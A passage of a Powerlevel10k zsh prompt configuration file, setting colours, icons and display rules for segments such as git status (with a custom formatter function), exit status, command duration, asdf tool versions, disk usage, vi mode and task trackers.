# typeset -g POWERLEVEL9K_DIR_WORK_VISUAL_IDENTIFIER_EXPANSION='⭐'
# typeset -g POWERLEVEL9K_DIR_WORK_BACKGROUND=4
# typeset -g POWERLEVEL9K_DIR_WORK_FOREGROUND=254
# typeset -g POWERLEVEL9K_DIR_WORK_SHORTENED_FOREGROUND=250
# typeset -g POWERLEVEL9K_DIR_WORK_ANCHOR_FOREGROUND=255
#
# # Styling for WORK_NOT_WRITABLE.
# typeset -g POWERLEVEL9K_DIR_WORK_NOT_WRITABLE_VISUAL_IDENTIFIER_EXPANSION='⭐'
# typeset -g POWERLEVEL9K_DIR_WORK_NOT_WRITABLE_BACKGROUND=4
# typeset -g POWERLEVEL9K_DIR_WORK_NOT_WRITABLE_FOREGROUND=254
# typeset -g POWERLEVEL9K_DIR_WORK_NOT_WRITABLE_SHORTENED_FOREGROUND=250
# typeset -g POWERLEVEL9K_DIR_WORK_NOT_WRITABLE_ANCHOR_FOREGROUND=255
#
# If a styling parameter isn't explicitly defined for some class, it falls back to the classless
# parameter. For example, if POWERLEVEL9K_DIR_WORK_NOT_WRITABLE_FOREGROUND is not set, it falls
# back to POWERLEVEL9K_DIR_FOREGROUND.
#
typeset -g POWERLEVEL9K_DIR_CLASSES=()
# Custom prefix.
# typeset -g POWERLEVEL9K_DIR_PREFIX='in '
#####################################[ vcs: git status ]######################################
# Version control system colors.
# typeset -g POWERLEVEL9K_VCS_CLEAN_BACKGROUND=2
# typeset -g POWERLEVEL9K_VCS_MODIFIED_BACKGROUND=3
# typeset -g POWERLEVEL9K_VCS_UNTRACKED_BACKGROUND=2
# typeset -g POWERLEVEL9K_VCS_CONFLICTED_BACKGROUND=3
# typeset -g POWERLEVEL9K_VCS_LOADING_BACKGROUND=8
# Branch icon. Set this parameter to '\uF126 ' for the popular Powerline branch icon.
typeset -g POWERLEVEL9K_VCS_BRANCH_ICON=
# Untracked files icon. It's really a question mark, your font isn't broken.
# Change the value of this parameter to show a different icon.
typeset -g POWERLEVEL9K_VCS_UNTRACKED_ICON='?'
# Formatter for Git status.
#
# Example output: master ⇣42⇡42 *42 merge ~42 +42 !42 ?42.
#
# You can edit the function to customize how Git status looks.
#
# VCS_STATUS_* parameters are set by gitstatus plugin. See reference:
# https://github.com/romkatv/gitstatus/blob/master/gitstatus.plugin.zsh.
function my_git_formatter() {
emulate -L zsh
if [[ -n $P9K_CONTENT ]]; then
# If P9K_CONTENT is not empty, use it. It's either "loading" or from vcs_info (not from
# gitstatus plugin). VCS_STATUS_* parameters are not available in this case.
typeset -g my_git_format=$P9K_CONTENT
return
fi
# Styling for different parts of Git status.
local meta='%7F' # white foreground
local clean='%0F' # black foreground
local modified='%0F' # black foreground
local untracked='%0F' # black foreground
local conflicted='%1F' # red foreground
local res
local where # branch or tag
if [[ -n $VCS_STATUS_LOCAL_BRANCH ]]; then
res+="${clean}${(g::)POWERLEVEL9K_VCS_BRANCH_ICON}"
where=${(V)VCS_STATUS_LOCAL_BRANCH}
elif [[ -n $VCS_STATUS_TAG ]]; then
res+="${meta}#"
where=${(V)VCS_STATUS_TAG}
fi
# If local branch name or tag is at most 32 characters long, show it in full.
# Otherwise show the first 12 … the last 12.
# Tip: To always show local branch name in full without truncation, delete the next line.
(( $#where > 32 )) && where[13,-13]="…"
res+="${clean}${where//\%/%%}" # escape %
# Display the current Git commit if there is no branch or tag.
# Tip: To always display the current Git commit, remove `[[ -z $where ]] &&` from the next line.
[[ -z $where ]] && res+="${meta}@${clean}${VCS_STATUS_COMMIT[1,8]}"
# Show tracking branch name if it differs from local branch.
if [[ -n ${VCS_STATUS_REMOTE_BRANCH:#$VCS_STATUS_LOCAL_BRANCH} ]]; then
res+="${meta}:${clean}${(V)VCS_STATUS_REMOTE_BRANCH//\%/%%}" # escape %
fi
# ⇣42 if behind the remote.
(( VCS_STATUS_COMMITS_BEHIND )) && res+=" ${clean}⇣${VCS_STATUS_COMMITS_BEHIND}"
# ⇡42 if ahead of the remote; no leading space if also behind the remote: ⇣42⇡42.
(( VCS_STATUS_COMMITS_AHEAD && !VCS_STATUS_COMMITS_BEHIND )) && res+=" "
(( VCS_STATUS_COMMITS_AHEAD )) && res+="${clean}⇡${VCS_STATUS_COMMITS_AHEAD}"
# ⇠42 if behind the push remote.
(( VCS_STATUS_PUSH_COMMITS_BEHIND )) && res+=" ${clean}⇠${VCS_STATUS_PUSH_COMMITS_BEHIND}"
(( VCS_STATUS_PUSH_COMMITS_AHEAD && !VCS_STATUS_PUSH_COMMITS_BEHIND )) && res+=" "
# ⇢42 if ahead of the push remote; no leading space if also behind: ⇠42⇢42.
(( VCS_STATUS_PUSH_COMMITS_AHEAD )) && res+="${clean}⇢${VCS_STATUS_PUSH_COMMITS_AHEAD}"
# *42 if have stashes.
(( VCS_STATUS_STASHES )) && res+=" ${clean}*${VCS_STATUS_STASHES}"
# 'merge' if the repo is in an unusual state.
[[ -n $VCS_STATUS_ACTION ]] && res+=" ${conflicted}${VCS_STATUS_ACTION}"
# ~42 if have merge conflicts.
(( VCS_STATUS_NUM_CONFLICTED )) && res+=" ${conflicted}~${VCS_STATUS_NUM_CONFLICTED}"
# +42 if have staged changes.
(( VCS_STATUS_NUM_STAGED )) && res+=" ${modified}+${VCS_STATUS_NUM_STAGED}"
# !42 if have unstaged changes.
(( VCS_STATUS_NUM_UNSTAGED )) && res+=" ${modified}!${VCS_STATUS_NUM_UNSTAGED}"
# ?42 if have untracked files. It's really a question mark, your font isn't broken.
# See POWERLEVEL9K_VCS_UNTRACKED_ICON above if you want to use a different icon.
# Remove the next line if you don't want to see untracked files at all.
(( VCS_STATUS_NUM_UNTRACKED )) && res+=" ${untracked}${(g::)POWERLEVEL9K_VCS_UNTRACKED_ICON}${VCS_STATUS_NUM_UNTRACKED}"
# "─" if the number of unstaged files is unknown. This can happen due to
# POWERLEVEL9K_VCS_MAX_INDEX_SIZE_DIRTY (see below) being set to a non-negative number lower
# than the number of files in the Git index, or due to bash.showDirtyState being set to false
# in the repository config. The number of staged and untracked files may also be unknown
# in this case.
(( VCS_STATUS_HAS_UNSTAGED == -1 )) && res+=" ${modified}─"
typeset -g my_git_format=$res
}
functions -M my_git_formatter 2>/dev/null
# Don't count the number of unstaged, untracked and conflicted files in Git repositories with
# more than this many files in the index. Negative value means infinity.
#
# If you are working in Git repositories with tens of millions of files and seeing performance
# sagging, try setting POWERLEVEL9K_VCS_MAX_INDEX_SIZE_DIRTY to a number lower than the output
# of `git ls-files | wc -l`. Alternatively, add `bash.showDirtyState = false` to the repository's
# config: `git config bash.showDirtyState false`.
typeset -g POWERLEVEL9K_VCS_MAX_INDEX_SIZE_DIRTY=-1
# Don't show Git status in prompt for repositories whose workdir matches this pattern.
# For example, if set to '~', the Git repository at $HOME/.git will be ignored.
# Multiple patterns can be combined with '|': '~(|/foo)|/bar/baz/*'.
typeset -g POWERLEVEL9K_VCS_DISABLED_WORKDIR_PATTERN='~'
# Disable the default Git status formatting.
typeset -g POWERLEVEL9K_VCS_DISABLE_GITSTATUS_FORMATTING=true
# Install our own Git status formatter.
typeset -g POWERLEVEL9K_VCS_CONTENT_EXPANSION='${$((my_git_formatter()))+${my_git_format}}'
# Enable counters for staged, unstaged, etc.
typeset -g POWERLEVEL9K_VCS_{STAGED,UNSTAGED,UNTRACKED,CONFLICTED,COMMITS_AHEAD,COMMITS_BEHIND}_MAX_NUM=-1
# Custom icon.
typeset -g POWERLEVEL9K_VCS_VISUAL_IDENTIFIER_EXPANSION=
# Custom prefix.
# typeset -g POWERLEVEL9K_VCS_PREFIX='on '
# Show status of repositories of these types. You can add svn and/or hg if you are
# using them. If you do, your prompt may become slow even when your current directory
# isn't in an svn or hg reposotiry.
typeset -g POWERLEVEL9K_VCS_BACKENDS=(git)
##########################[ status: exit code of the last command ]###########################
# Enable OK_PIPE, ERROR_PIPE and ERROR_SIGNAL status states to allow us to enable, disable and
# style them independently from the regular OK and ERROR state.
typeset -g POWERLEVEL9K_STATUS_EXTENDED_STATES=true
# Status on success. No content, just an icon. No need to show it if prompt_char is enabled as
# it will signify success by turning green.
typeset -g POWERLEVEL9K_STATUS_OK=false
typeset -g POWERLEVEL9K_STATUS_OK_VISUAL_IDENTIFIER_EXPANSION='✔'
# typeset -g POWERLEVEL9K_STATUS_OK_FOREGROUND=2
# typeset -g POWERLEVEL9K_STATUS_OK_BACKGROUND=0
# Status when some part of a pipe command fails but the overall exit status is zero. It may look
# like this: 1|0.
typeset -g POWERLEVEL9K_STATUS_OK_PIPE=true
typeset -g POWERLEVEL9K_STATUS_OK_PIPE_VISUAL_IDENTIFIER_EXPANSION='✔'
# typeset -g POWERLEVEL9K_STATUS_OK_PIPE_FOREGROUND=2
# typeset -g POWERLEVEL9K_STATUS_OK_PIPE_BACKGROUND=0
# Status when it's just an error code (e.g., '1'). No need to show it if prompt_char is enabled as
# it will signify error by turning red.
typeset -g POWERLEVEL9K_STATUS_ERROR=false
typeset -g POWERLEVEL9K_STATUS_ERROR_VISUAL_IDENTIFIER_EXPANSION='✘'
# typeset -g POWERLEVEL9K_STATUS_ERROR_FOREGROUND=3
# typeset -g POWERLEVEL9K_STATUS_ERROR_BACKGROUND=1
# Status when the last command was terminated by a signal.
typeset -g POWERLEVEL9K_STATUS_ERROR_SIGNAL=true
# Use terse signal names: "INT" instead of "SIGINT(2)".
typeset -g POWERLEVEL9K_STATUS_VERBOSE_SIGNAME=false
typeset -g POWERLEVEL9K_STATUS_ERROR_SIGNAL_VISUAL_IDENTIFIER_EXPANSION='✘'
# typeset -g POWERLEVEL9K_STATUS_ERROR_SIGNAL_FOREGROUND=3
# typeset -g POWERLEVEL9K_STATUS_ERROR_SIGNAL_BACKGROUND=1
# Status when some part of a pipe command fails and the overall exit status is also non-zero.
# It may look like this: 1|0.
typeset -g POWERLEVEL9K_STATUS_ERROR_PIPE=true
typeset -g POWERLEVEL9K_STATUS_ERROR_PIPE_VISUAL_IDENTIFIER_EXPANSION='✘'
# typeset -g POWERLEVEL9K_STATUS_ERROR_PIPE_FOREGROUND=3
# typeset -g POWERLEVEL9K_STATUS_ERROR_PIPE_BACKGROUND=1
###################[ command_execution_time: duration of the last command ]###################
# Execution time color.
typeset -g POWERLEVEL9K_COMMAND_EXECUTION_TIME_FOREGROUND=0
typeset -g POWERLEVEL9K_COMMAND_EXECUTION_TIME_BACKGROUND=3
# Show duration of the last command if takes at least this many seconds.
typeset -g POWERLEVEL9K_COMMAND_EXECUTION_TIME_THRESHOLD=3
# Show this many fractional digits. Zero means round to seconds.
typeset -g POWERLEVEL9K_COMMAND_EXECUTION_TIME_PRECISION=0
# Duration format: 1d 2h 3m 4s.
typeset -g POWERLEVEL9K_COMMAND_EXECUTION_TIME_FORMAT='d h m s'
# Custom icon.
typeset -g POWERLEVEL9K_COMMAND_EXECUTION_TIME_VISUAL_IDENTIFIER_EXPANSION=
# Custom prefix.
# typeset -g POWERLEVEL9K_COMMAND_EXECUTION_TIME_PREFIX='took '
#######################[ background_jobs: presence of background jobs ]#######################
# Background jobs color.
# typeset -g POWERLEVEL9K_BACKGROUND_JOBS_FOREGROUND=6
# typeset -g POWERLEVEL9K_BACKGROUND_JOBS_BACKGROUND=0
# Don't show the number of background jobs.
typeset -g POWERLEVEL9K_BACKGROUND_JOBS_VERBOSE=false
# Custom icon.
# typeset -g POWERLEVEL9K_BACKGROUND_JOBS_VISUAL_IDENTIFIER_EXPANSION='⭐'
#######################[ direnv: direnv status (https://direnv.net/) ]########################
# Direnv color.
# typeset -g POWERLEVEL9K_DIRENV_FOREGROUND=3
# typeset -g POWERLEVEL9K_DIRENV_BACKGROUND=0
# Custom icon.
# typeset -g POWERLEVEL9K_DIRENV_VISUAL_IDENTIFIER_EXPANSION='⭐'
###############[ asdf: asdf version manager (https://github.com/asdf-vm/asdf) ]###############
# Default asdf color. Only used to display tools for which there is no color override (see below).
# Tip: Override these parameters for ${TOOL} with POWERLEVEL9K_ASDF_${TOOL}_FOREGROUND and
# POWERLEVEL9K_ASDF_${TOOL}_BACKGROUND.
typeset -g POWERLEVEL9K_ASDF_FOREGROUND=0
typeset -g POWERLEVEL9K_ASDF_BACKGROUND=7
# There are four parameters that can be used to hide asdf tools. Each parameter describes
# conditions under which a tool gets hidden. Parameters can hide tools but not unhide them. If at
# least one parameter decides to hide a tool, that tool gets hidden. If no parameter decides to
# hide a tool, it gets shown.
#
# Special note on the difference between POWERLEVEL9K_ASDF_SOURCES and
# POWERLEVEL9K_ASDF_PROMPT_ALWAYS_SHOW. Consider the effect of the following commands:
#
# asdf local python 3.8.1
# asdf global python 3.8.1
#
# After running both commands the current python version is 3.8.1 and its source is "local" as
# it takes precedence over "global". If POWERLEVEL9K_ASDF_PROMPT_ALWAYS_SHOW is set to false,
# it'll hide python version in this case because 3.8.1 is the same as the global version.
# POWERLEVEL9K_ASDF_SOURCES will hide python version only if the value of this parameter doesn't
# contain "local".
# Hide tool versions that don't come from one of these sources.
#
# Available sources:
#
# - shell `asdf current` says "set by ASDF_${TOOL}_VERSION environment variable"
# - local `asdf current` says "set by /some/not/home/directory/file"
# - global `asdf current` says "set by /home/username/file"
#
# Note: If this parameter is set to (shell local global), it won't hide tools.
# Tip: Override this parameter for ${TOOL} with POWERLEVEL9K_ASDF_${TOOL}_SOURCES.
typeset -g POWERLEVEL9K_ASDF_SOURCES=(shell local global)
# If set to false, hide tool versions that are the same as global.
#
# Note: The name of this parameter doesn't reflect its meaning at all.
# Note: If this parameter is set to true, it won't hide tools.
# Tip: Override this parameter for ${TOOL} with POWERLEVEL9K_ASDF_${TOOL}_PROMPT_ALWAYS_SHOW.
typeset -g POWERLEVEL9K_ASDF_PROMPT_ALWAYS_SHOW=false
# If set to false, hide tool versions that are equal to "system".
#
# Note: If this parameter is set to true, it won't hide tools.
# Tip: Override this parameter for ${TOOL} with POWERLEVEL9K_ASDF_${TOOL}_SHOW_SYSTEM.
typeset -g POWERLEVEL9K_ASDF_SHOW_SYSTEM=true
# If set to non-empty value, hide tools unless there is a file matching the specified file pattern
# in the current directory, or its parent directory, or its grandparent directory, and so on.
#
# Note: If this parameter is set to empty value, it won't hide tools.
# Note: SHOW_ON_UPGLOB isn't specific to asdf. It works with all prompt segments.
# Tip: Override this parameter for ${TOOL} with POWERLEVEL9K_ASDF_${TOOL}_SHOW_ON_UPGLOB.
#
# Example: Hide nodejs version when there is no package.json and no *.js files in the current
# directory, in `..`, in `../..` and so on.
#
# typeset -g POWERLEVEL9K_ASDF_NODEJS_SHOW_ON_UPGLOB='*.js|package.json'
typeset -g POWERLEVEL9K_ASDF_SHOW_ON_UPGLOB=
# Ruby version from asdf.
typeset -g POWERLEVEL9K_ASDF_RUBY_FOREGROUND=0
typeset -g POWERLEVEL9K_ASDF_RUBY_BACKGROUND=1
# typeset -g POWERLEVEL9K_ASDF_RUBY_VISUAL_IDENTIFIER_EXPANSION='⭐'
# typeset -g POWERLEVEL9K_ASDF_RUBY_SHOW_ON_UPGLOB='*.foo|*.bar'
# Python version from asdf.
typeset -g POWERLEVEL9K_ASDF_PYTHON_FOREGROUND=0
typeset -g POWERLEVEL9K_ASDF_PYTHON_BACKGROUND=4
# typeset -g POWERLEVEL9K_ASDF_PYTHON_VISUAL_IDENTIFIER_EXPANSION='⭐'
# typeset -g POWERLEVEL9K_ASDF_PYTHON_SHOW_ON_UPGLOB='*.foo|*.bar'
# Go version from asdf.
typeset -g POWERLEVEL9K_ASDF_GOLANG_FOREGROUND=0
typeset -g POWERLEVEL9K_ASDF_GOLANG_BACKGROUND=4
# typeset -g POWERLEVEL9K_ASDF_GOLANG_VISUAL_IDENTIFIER_EXPANSION='⭐'
# typeset -g POWERLEVEL9K_ASDF_GOLANG_SHOW_ON_UPGLOB='*.foo|*.bar'
# Node.js version from asdf.
typeset -g POWERLEVEL9K_ASDF_NODEJS_FOREGROUND=0
typeset -g POWERLEVEL9K_ASDF_NODEJS_BACKGROUND=2
# typeset -g POWERLEVEL9K_ASDF_NODEJS_VISUAL_IDENTIFIER_EXPANSION='⭐'
# typeset -g POWERLEVEL9K_ASDF_NODEJS_SHOW_ON_UPGLOB='*.foo|*.bar'
# Rust version from asdf.
typeset -g POWERLEVEL9K_ASDF_RUST_FOREGROUND=0
typeset -g POWERLEVEL9K_ASDF_RUST_BACKGROUND=208
# typeset -g POWERLEVEL9K_ASDF_RUST_VISUAL_IDENTIFIER_EXPANSION='⭐'
# typeset -g POWERLEVEL9K_ASDF_RUST_SHOW_ON_UPGLOB='*.foo|*.bar'
# .NET Core version from asdf.
typeset -g POWERLEVEL9K_ASDF_DOTNET_CORE_FOREGROUND=0
typeset -g POWERLEVEL9K_ASDF_DOTNET_CORE_BACKGROUND=5
# typeset -g POWERLEVEL9K_ASDF_DOTNET_CORE_VISUAL_IDENTIFIER_EXPANSION='⭐'
# typeset -g POWERLEVEL9K_ASDF_DOTNET_CORE_SHOW_ON_UPGLOB='*.foo|*.bar'
# Flutter version from asdf.
typeset -g POWERLEVEL9K_ASDF_FLUTTER_FOREGROUND=0
typeset -g POWERLEVEL9K_ASDF_FLUTTER_BACKGROUND=4
# typeset -g POWERLEVEL9K_ASDF_FLUTTER_VISUAL_IDENTIFIER_EXPANSION='⭐'
# typeset -g POWERLEVEL9K_ASDF_FLUTTER_SHOW_ON_UPGLOB='*.foo|*.bar'
# Lua version from asdf.
typeset -g POWERLEVEL9K_ASDF_LUA_FOREGROUND=0
typeset -g POWERLEVEL9K_ASDF_LUA_BACKGROUND=4
# typeset -g POWERLEVEL9K_ASDF_LUA_VISUAL_IDENTIFIER_EXPANSION='⭐'
# typeset -g POWERLEVEL9K_ASDF_LUA_SHOW_ON_UPGLOB='*.foo|*.bar'
# Java version from asdf.
typeset -g POWERLEVEL9K_ASDF_JAVA_FOREGROUND=1
typeset -g POWERLEVEL9K_ASDF_JAVA_BACKGROUND=7
# typeset -g POWERLEVEL9K_ASDF_JAVA_VISUAL_IDENTIFIER_EXPANSION='⭐'
# typeset -g POWERLEVEL9K_ASDF_JAVA_SHOW_ON_UPGLOB='*.foo|*.bar'
# Perl version from asdf.
typeset -g POWERLEVEL9K_ASDF_PERL_FOREGROUND=0
typeset -g POWERLEVEL9K_ASDF_PERL_BACKGROUND=4
# typeset -g POWERLEVEL9K_ASDF_PERL_VISUAL_IDENTIFIER_EXPANSION='⭐'
# typeset -g POWERLEVEL9K_ASDF_PERL_SHOW_ON_UPGLOB='*.foo|*.bar'
# Erlang version from asdf.
typeset -g POWERLEVEL9K_ASDF_ERLANG_FOREGROUND=0
typeset -g POWERLEVEL9K_ASDF_ERLANG_BACKGROUND=1
# typeset -g POWERLEVEL9K_ASDF_ERLANG_VISUAL_IDENTIFIER_EXPANSION='⭐'
# typeset -g POWERLEVEL9K_ASDF_ERLANG_SHOW_ON_UPGLOB='*.foo|*.bar'
# Elixir version from asdf.
typeset -g POWERLEVEL9K_ASDF_ELIXIR_FOREGROUND=0
typeset -g POWERLEVEL9K_ASDF_ELIXIR_BACKGROUND=5
# typeset -g POWERLEVEL9K_ASDF_ELIXIR_VISUAL_IDENTIFIER_EXPANSION='⭐'
# typeset -g POWERLEVEL9K_ASDF_ELIXIR_SHOW_ON_UPGLOB='*.foo|*.bar'
# Postgres version from asdf.
typeset -g POWERLEVEL9K_ASDF_POSTGRES_FOREGROUND=0
typeset -g POWERLEVEL9K_ASDF_POSTGRES_BACKGROUND=6
# typeset -g POWERLEVEL9K_ASDF_POSTGRES_VISUAL_IDENTIFIER_EXPANSION='⭐'
# typeset -g POWERLEVEL9K_ASDF_POSTGRES_SHOW_ON_UPGLOB='*.foo|*.bar'
# PHP version from asdf.
typeset -g POWERLEVEL9K_ASDF_PHP_FOREGROUND=0
typeset -g POWERLEVEL9K_ASDF_PHP_BACKGROUND=5
# typeset -g POWERLEVEL9K_ASDF_PHP_VISUAL_IDENTIFIER_EXPANSION='⭐'
# typeset -g POWERLEVEL9K_ASDF_PHP_SHOW_ON_UPGLOB='*.foo|*.bar'
# Haskell version from asdf.
typeset -g POWERLEVEL9K_ASDF_HASKELL_FOREGROUND=0
typeset -g POWERLEVEL9K_ASDF_HASKELL_BACKGROUND=3
# typeset -g POWERLEVEL9K_ASDF_HASKELL_VISUAL_IDENTIFIER_EXPANSION='⭐'
# typeset -g POWERLEVEL9K_ASDF_HASKELL_SHOW_ON_UPGLOB='*.foo|*.bar'
# Julia version from asdf.
typeset -g POWERLEVEL9K_ASDF_JULIA_FOREGROUND=0
typeset -g POWERLEVEL9K_ASDF_JULIA_BACKGROUND=2
# typeset -g POWERLEVEL9K_ASDF_JULIA_VISUAL_IDENTIFIER_EXPANSION='⭐'
# typeset -g POWERLEVEL9K_ASDF_JULIA_SHOW_ON_UPGLOB='*.foo|*.bar'
##########[ nordvpn: nordvpn connection status, linux only (https://nordvpn.com/) ]###########
# NordVPN connection indicator color.
# typeset -g POWERLEVEL9K_NORDVPN_FOREGROUND=7
# typeset -g POWERLEVEL9K_NORDVPN_BACKGROUND=4
# Hide NordVPN connection indicator when not connected.
typeset -g POWERLEVEL9K_NORDVPN_{DISCONNECTED,CONNECTING,DISCONNECTING}_CONTENT_EXPANSION=
typeset -g POWERLEVEL9K_NORDVPN_{DISCONNECTED,CONNECTING,DISCONNECTING}_VISUAL_IDENTIFIER_EXPANSION=
# Custom icon.
# typeset -g POWERLEVEL9K_NORDVPN_VISUAL_IDENTIFIER_EXPANSION='⭐'
#################[ ranger: ranger shell (https://github.com/ranger/ranger) ]##################
# Ranger shell color.
# typeset -g POWERLEVEL9K_RANGER_FOREGROUND=3
# typeset -g POWERLEVEL9K_RANGER_BACKGROUND=0
# Custom icon.
# typeset -g POWERLEVEL9K_RANGER_VISUAL_IDENTIFIER_EXPANSION='⭐'
######################[ nnn: nnn shell (https://github.com/jarun/nnn) ]#######################
# Nnn shell color.
# typeset -g POWERLEVEL9K_NNN_FOREGROUND=0
# typeset -g POWERLEVEL9K_NNN_BACKGROUND=6
# Custom icon.
# typeset -g POWERLEVEL9K_NNN_VISUAL_IDENTIFIER_EXPANSION='⭐'
###########################[ vim_shell: vim shell indicator (:sh) ]###########################
# Vim shell indicator color.
# typeset -g POWERLEVEL9K_VIM_SHELL_FOREGROUND=0
# typeset -g POWERLEVEL9K_VIM_SHELL_BACKGROUND=2
# Custom icon.
# typeset -g POWERLEVEL9K_VIM_SHELL_VISUAL_IDENTIFIER_EXPANSION='⭐'
######[ midnight_commander: midnight commander shell (https://midnight-commander.org/) ]######
# Midnight Commander shell color.
# typeset -g POWERLEVEL9K_MIDNIGHT_COMMANDER_FOREGROUND=3
# typeset -g POWERLEVEL9K_MIDNIGHT_COMMANDER_BACKGROUND=0
# Custom icon.
# typeset -g POWERLEVEL9K_MIDNIGHT_COMMANDER_VISUAL_IDENTIFIER_EXPANSION='⭐'
#[ nix_shell: nix shell (https://nixos.org/nixos/nix-pills/developing-with-nix-shell.html) ]##
# Nix shell color.
# typeset -g POWERLEVEL9K_NIX_SHELL_FOREGROUND=0
# typeset -g POWERLEVEL9K_NIX_SHELL_BACKGROUND=4
# Tip: If you want to see just the icon without "pure" and "impure", uncomment the next line.
# typeset -g POWERLEVEL9K_NIX_SHELL_CONTENT_EXPANSION=
# Custom icon.
# typeset -g POWERLEVEL9K_NIX_SHELL_VISUAL_IDENTIFIER_EXPANSION='⭐'
##################################[ disk_usage: disk usage ]##################################
# Colors for different levels of disk usage.
# typeset -g POWERLEVEL9K_DISK_USAGE_NORMAL_FOREGROUND=3
# typeset -g POWERLEVEL9K_DISK_USAGE_NORMAL_BACKGROUND=0
# typeset -g POWERLEVEL9K_DISK_USAGE_WARNING_FOREGROUND=0
# typeset -g POWERLEVEL9K_DISK_USAGE_WARNING_BACKGROUND=3
# typeset -g POWERLEVEL9K_DISK_USAGE_CRITICAL_FOREGROUND=7
# typeset -g POWERLEVEL9K_DISK_USAGE_CRITICAL_BACKGROUND=1
# Thresholds for different levels of disk usage (percentage points).
typeset -g POWERLEVEL9K_DISK_USAGE_WARNING_LEVEL=90
typeset -g POWERLEVEL9K_DISK_USAGE_CRITICAL_LEVEL=95
# If set to true, hide disk usage when below $POWERLEVEL9K_DISK_USAGE_WARNING_LEVEL percent.
typeset -g POWERLEVEL9K_DISK_USAGE_ONLY_WARNING=false
# Custom icon.
# typeset -g POWERLEVEL9K_DISK_USAGE_VISUAL_IDENTIFIER_EXPANSION='⭐'
###########[ vi_mode: vi mode (you don't need this if you've enabled prompt_char) ]###########
# Foreground color.
typeset -g POWERLEVEL9K_VI_MODE_FOREGROUND=0
# Text and color for normal (a.k.a. command) vi mode.
typeset -g POWERLEVEL9K_VI_COMMAND_MODE_STRING=NORMAL
typeset -g POWERLEVEL9K_VI_MODE_NORMAL_BACKGROUND=2
# Text and color for visual vi mode.
typeset -g POWERLEVEL9K_VI_VISUAL_MODE_STRING=VISUAL
typeset -g POWERLEVEL9K_VI_MODE_VISUAL_BACKGROUND=4
# Text and color for overtype (a.k.a. overwrite and replace) vi mode.
typeset -g POWERLEVEL9K_VI_OVERWRITE_MODE_STRING=OVERTYPE
typeset -g POWERLEVEL9K_VI_MODE_OVERWRITE_BACKGROUND=3
# Text and color for insert vi mode.
typeset -g POWERLEVEL9K_VI_INSERT_MODE_STRING=
typeset -g POWERLEVEL9K_VI_MODE_INSERT_FOREGROUND=8
######################################[ ram: free RAM ]#######################################
# RAM color.
# typeset -g POWERLEVEL9K_RAM_FOREGROUND=0
# typeset -g POWERLEVEL9K_RAM_BACKGROUND=3
# Custom icon.
# typeset -g POWERLEVEL9K_RAM_VISUAL_IDENTIFIER_EXPANSION='⭐'
#####################################[ swap: used swap ]######################################
# Swap color.
# typeset -g POWERLEVEL9K_SWAP_FOREGROUND=0
# typeset -g POWERLEVEL9K_SWAP_BACKGROUND=3
# Custom icon.
# typeset -g POWERLEVEL9K_SWAP_VISUAL_IDENTIFIER_EXPANSION='⭐'
######################################[ load: CPU load ]######################################
# Show average CPU load over this many last minutes. Valid values are 1, 5 and 15.
typeset -g POWERLEVEL9K_LOAD_WHICH=5
# Load color when load is under 50%.
# typeset -g POWERLEVEL9K_LOAD_NORMAL_FOREGROUND=0
# typeset -g POWERLEVEL9K_LOAD_NORMAL_BACKGROUND=2
# Load color when load is between 50% and 70%.
# typeset -g POWERLEVEL9K_LOAD_WARNING_FOREGROUND=0
# typeset -g POWERLEVEL9K_LOAD_WARNING_BACKGROUND=3
# Load color when load is over 70%.
# typeset -g POWERLEVEL9K_LOAD_CRITICAL_FOREGROUND=0
# typeset -g POWERLEVEL9K_LOAD_CRITICAL_BACKGROUND=1
# Custom icon.
# typeset -g POWERLEVEL9K_LOAD_VISUAL_IDENTIFIER_EXPANSION='⭐'
################[ todo: todo items (https://github.com/todotxt/todo.txt-cli) ]################
# Todo color.
# typeset -g POWERLEVEL9K_TODO_FOREGROUND=0
# typeset -g POWERLEVEL9K_TODO_BACKGROUND=8
# Hide todo when the total number of tasks is zero.
typeset -g POWERLEVEL9K_TODO_HIDE_ZERO_TOTAL=true
# Hide todo when the number of tasks after filtering is zero.
typeset -g POWERLEVEL9K_TODO_HIDE_ZERO_FILTERED=false
# Todo format. The following parameters are available within the expansion.
#
# - P9K_TODO_TOTAL_TASK_COUNT The total number of tasks.
# - P9K_TODO_FILTERED_TASK_COUNT The number of tasks after filtering.
#
# These variables correspond to the last line of the output of `todo.sh -p ls`:
#
# TODO: 24 of 42 tasks shown
#
# Here 24 is P9K_TODO_FILTERED_TASK_COUNT and 42 is P9K_TODO_TOTAL_TASK_COUNT.
#
# typeset -g POWERLEVEL9K_TODO_CONTENT_EXPANSION='$P9K_TODO_FILTERED_TASK_COUNT'
# Custom icon.
# typeset -g POWERLEVEL9K_TODO_VISUAL_IDENTIFIER_EXPANSION='⭐'
###########[ timewarrior: timewarrior tracking status (https://timewarrior.net/) ]############
# Timewarrior color.
# typeset -g POWERLEVEL9K_TIMEWARRIOR_FOREGROUND=255
# typeset -g POWERLEVEL9K_TIMEWARRIOR_BACKGROUND=8
# If the tracked task is longer than 24 characters, truncate and append "…".
# Tip: To always display tasks without truncation, delete the following parameter.
# Tip: To hide task names and display just the icon when time tracking is enabled, set the
# value of the following parameter to "".
typeset -g POWERLEVEL9K_TIMEWARRIOR_CONTENT_EXPANSION='${P9K_CONTENT:0:24}${${P9K_CONTENT:24}:+…}'
# Custom icon.
# typeset -g POWERLEVEL9K_TIMEWARRIOR_VISUAL_IDENTIFIER_EXPANSION='⭐'
##############[ taskwarrior: taskwarrior task count (https://taskwarrior.org/) ]##############
# Taskwarrior color.
# typeset -g POWERLEVEL9K_TASKWARRIOR_FOREGROUND=0
# typeset -g POWERLEVEL9K_TASKWARRIOR_BACKGROUND=6
# Taskwarrior segment format. The following parameters are available within the expansion.
#
# - P9K_TASKWARRIOR_PENDING_COUNT The number of pending tasks: `task +PENDING count`.
# - P9K_TASKWARRIOR_OVERDUE_COUNT The number of overdue tasks: `task +OVERDUE count`.
#
# Zero values are represented as empty parameters.
#
# The default format:
#
# '${P9K_TASKWARRIOR_OVERDUE_COUNT:+"!$P9K_TASKWARRIOR_OVERDUE_COUNT/"}$P9K_TASKWARRIOR_PENDING_COUNT'
#
# typeset -g POWERLEVEL9K_TASKWARRIOR_CONTENT_EXPANSION='$P9K_TASKWARRIOR_PENDING_COUNT'
# Custom icon.
# typeset -g POWERLEVEL9K_TASKWARRIOR_VISUAL_IDENTIFIER_EXPANSION='⭐'
##################################[ context: user@hostname ]##################################
# Context color when running with privileges.
typeset -g POWERLEVEL9K_CONTEXT_ROOT_FOREGROUND=1
typeset -g POWERLEVEL9K_CONTEXT_ROOT_BACKGROUND=0
# Context color in SSH without privileges.
